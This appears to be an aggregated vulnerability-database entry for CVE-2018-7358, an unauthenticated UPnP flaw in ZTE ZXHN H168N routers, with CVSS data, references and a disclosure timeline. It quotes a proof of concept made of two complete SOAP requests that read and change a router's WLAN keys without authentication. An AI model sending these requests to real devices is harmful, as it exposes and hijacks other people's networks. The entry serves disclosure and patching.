ID

VAR-201811-0984


CVE

CVE-2018-7358


TITLE

Authentication vulnerability in ZTE ZXHN H168N products

Trust: 0.8

sources: JVNDB: JVNDB-2018-012683

DESCRIPTION

ZTE ZXHN H168N products with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper change control vulnerability, which may allow an unauthorized user to perform unauthorized operations. The ZTE ZXHN H168N product contains authentication vulnerabilities. Information may be obtained or altered, and service operation may be disrupted (DoS). ZTE ZXHN H168N is prone to an authorization-bypass vulnerability. ZTE ZXHN H168N versions 2.2.0_PK1.2T5, 2.2.0_PK1.2T2, 2.2.0_PK11T7 and 2.2.0_PK11T are vulnerable. ZTE ZXHN H168N is a wireless VDSL router from China's ZTE Corporation (ZTE). There are security holes in ZTE ZXHN H168N. The following versions are affected: ZTE ZXHN H168N V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T.

[*] POC: (CVE-2018-7357 and CVE-2018-7358)

Disclaimer: [This POC is for Educational Purposes, I would Not be responsible for any misuse of the information mentioned in this blog post]

[+] Unauthenticated
[+] Author: Usman Saeed (usman [at] xc0re.net)
[+] Protocol: UPnP
[+] Affected Hardware/Software:
Model name: ZXHN H168N v2.2
Build Timestamp: 20171127193202
Software Version: V2.2.0_PK1.2T5

[+] Findings:

1. Unauthenticated access to WLAN password:

    POST /control/igd/wlanc_1_1 HTTP/1.1
    Host: <IP>:52869
    User-Agent: {omitted}
    Content-Length: 288
    Connection: close
    Content-Type: text/xml; charset="utf-8"
    SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys"

    <?xml version="1.0" encoding="utf-8"?>
    <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:GetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"></u:GetSecurityKeys></s:Body></s:Envelope>

2. Unauthenticated WLAN passphrase change:

    POST /control/igd/wlanc_1_1 HTTP/1.1
    Host: <IP>:52869
    User-Agent: {omitted}
    Content-Length: 496
    Connection: close
    Content-Type: text/xml; charset="utf-8"
    SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys"

    <?xml version="1.0" encoding="utf-8"?>
    <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:SetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"><NewWEPKey0>{omitted}</NewWEPKey0><NewWEPKey1>{omitted}</NewWEPKey1><NewWEPKey2>{omitted}</NewWEPKey2><NewWEPKey3>{omitted}</NewWEPKey3><NewPreSharedKey>{omitted}</NewPreSharedKey><NewKeyPassphrase>{omitted}</NewKeyPassphrase></u:SetSecurityKeys></s:Body></s:Envelope>

[*] Solution: UPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices.

[*] Note: There are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same.

[+] Responsible Disclosure:
Vulnerabilities identified - 20 August, 2018
Reported to ZTE - 28 August, 2018
ZTE official statement - 17 September 2018
ZTE patched the vulnerability - 12 November 2018
The operator pushed the update - 12 November 2018
CVE published - CVE-2018-7357 and CVE-2018-7358
Public disclosure - 12 November 2018

Ref: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522

Trust: 2.07

sources: NVD: CVE-2018-7358 // JVNDB: JVNDB-2018-012683 // BID: 105963 // VULHUB: VHN-137390 // PACKETSTORM: 150728

AFFECTED PRODUCTS

vendor: zte, model: zxhn h168n, scope: eq, version: 2.2.0_pk1.2t2

Trust: 2.4

vendor: zte, model: zxhn h168n, scope: eq, version: 2.2.0_pk1.2t5

Trust: 2.4

vendor: zte, model: zxhn h168n, scope: eq, version: 2.2.0_pk11t

Trust: 2.4

vendor: zte, model: zxhn h168n, scope: eq, version: 2.2.0_pk11t7

Trust: 2.4

vendor: zte, model: zxhn h168n 2.2.0 pk11t7, scope: -, version: -

Trust: 0.3

vendor: zte, model: zxhn h168n 2.2.0 pk11t, scope: -, version: -

Trust: 0.3

vendor: zte, model: zxhn h168n 2.2.0 pk1.2t5, scope: -, version: -

Trust: 0.3

vendor: zte, model: zxhn h168n 2.2.0 pk1.2t2, scope: -, version: -

Trust: 0.3

vendor: zte, model: zxhn h168n 2.2.0 pk1.2t6, scope: ne, version: -

Trust: 0.3

sources: BID: 105963 // JVNDB: JVNDB-2018-012683 // CNNVD: CNNVD-201811-445 // NVD: CVE-2018-7358

CVSS

SEVERITY

nvd@nist.gov: CVE-2018-7358
value: HIGH

Trust: 1.0

psirt@zte.com.cn: CVE-2018-7358
value: MEDIUM

Trust: 1.0

NVD: CVE-2018-7358
value: HIGH

Trust: 0.8

CNNVD: CNNVD-201811-445
value: HIGH

Trust: 0.6

VULHUB: VHN-137390
value: MEDIUM

Trust: 0.1

CVSSV2

nvd@nist.gov: CVE-2018-7358
severity: MEDIUM
baseScore: 5.8
vectorString: AV:A/AC:L/AU:N/C:P/I:P/A:P
accessVector: ADJACENT_NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 6.5
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-137390
severity: MEDIUM
baseScore: 5.8
vectorString: AV:A/AC:L/AU:N/C:P/I:P/A:P
accessVector: ADJACENT_NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 6.5
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

CVSSV3

nvd@nist.gov: CVE-2018-7358
baseSeverity: HIGH
baseScore: 8.8
vectorString: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: ADJACENT
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 2.8
impactScore: 5.9
version: 3.0

Trust: 1.8

psirt@zte.com.cn: CVE-2018-7358
baseSeverity: MEDIUM
baseScore: 6.5
vectorString: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
attackVector: ADJACENT
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: NONE
integrityImpact: NONE
availabilityImpact: HIGH
exploitabilityScore: 2.8
impactScore: 3.6
version: 3.0

Trust: 1.0

sources: VULHUB: VHN-137390 // JVNDB: JVNDB-2018-012683 // CNNVD: CNNVD-201811-445 // NVD: CVE-2018-7358 // NVD: CVE-2018-7358

PROBLEMTYPE DATA

problemtype:CWE-287

Trust: 1.9

sources: VULHUB: VHN-137390 // JVNDB: JVNDB-2018-012683 // NVD: CVE-2018-7358

THREAT TYPE

remote or local

Trust: 0.6

sources: CNNVD: CNNVD-201811-445

TYPE

authorization issue

Trust: 0.6

sources: CNNVD: CNNVD-201811-445

CONFIGURATIONS

sources: JVNDB: JVNDB-2018-012683

PATCH

title: Improper Authorization Vulnerabilities in ZTE ZXHN H168N Product
url: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523

Trust: 0.8

title: ZTE ZXHN H168N Security vulnerabilities
url: http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=86848

Trust: 0.6

sources: JVNDB: JVNDB-2018-012683 // CNNVD: CNNVD-201811-445

EXTERNAL IDS

db: NVD, id: CVE-2018-7358

Trust: 2.9

db: BID, id: 105963

Trust: 2.0

db: ZTE, id: 1009523

Trust: 2.0

db: EXPLOIT-DB, id: 45972

Trust: 1.7

db: JVNDB, id: JVNDB-2018-012683

Trust: 0.8

db: CNNVD, id: CNNVD-201811-445

Trust: 0.7

db: VULHUB, id: VHN-137390

Trust: 0.1

db: ZTE, id: 1009522

Trust: 0.1

db: PACKETSTORM, id: 150728

Trust: 0.1

sources: VULHUB: VHN-137390 // BID: 105963 // JVNDB: JVNDB-2018-012683 // PACKETSTORM: 150728 // CNNVD: CNNVD-201811-445 // NVD: CVE-2018-7358

REFERENCES

url:http://support.zte.com.cn/support/news/loopholeinfodetail.aspx?newsid=1009523

Trust: 2.0

url:http://www.securityfocus.com/bid/105963

Trust: 1.7

url:https://www.exploit-db.com/exploits/45972/

Trust: 1.7

url:https://nvd.nist.gov/vuln/detail/cve-2018-7358

Trust: 0.9

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7358

Trust: 0.8

url:http://www.zte.com.cn/

Trust: 0.3

url:http://support.zte.com.cn/support/news/loopholeinfodetail.aspx?newsid=1009522

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2018-7357

Trust: 0.1

sources: VULHUB: VHN-137390 // BID: 105963 // JVNDB: JVNDB-2018-012683 // PACKETSTORM: 150728 // CNNVD: CNNVD-201811-445 // NVD: CVE-2018-7358

CREDITS

Usman Saeed

Trust: 0.4

sources: BID: 105963 // PACKETSTORM: 150728

SOURCES

db: VULHUB, id: VHN-137390
db: BID, id: 105963
db: JVNDB, id: JVNDB-2018-012683
db: PACKETSTORM, id: 150728
db: CNNVD, id: CNNVD-201811-445
db: NVD, id: CVE-2018-7358

LAST UPDATE DATE

2024-11-23T22:30:10.941000+00:00


SOURCES UPDATE DATE

db: VULHUB, id: VHN-137390, date: 2019-10-09T00:00:00
db: BID, id: 105963, date: 2018-11-15T00:00:00
db: JVNDB, id: JVNDB-2018-012683, date: 2019-02-06T00:00:00
db: CNNVD, id: CNNVD-201811-445, date: 2019-10-17T00:00:00
db: NVD, id: CVE-2018-7358, date: 2024-11-21T04:12:03.917

SOURCES RELEASE DATE

db: VULHUB, id: VHN-137390, date: 2018-11-14T00:00:00
db: BID, id: 105963, date: 2018-11-15T00:00:00
db: JVNDB, id: JVNDB-2018-012683, date: 2019-02-06T00:00:00
db: PACKETSTORM, id: 150728, date: 2018-12-11T01:49:45
db: CNNVD, id: CNNVD-201811-445, date: 2018-11-15T00:00:00
db: NVD, id: CVE-2018-7358, date: 2018-11-14T15:29:02.220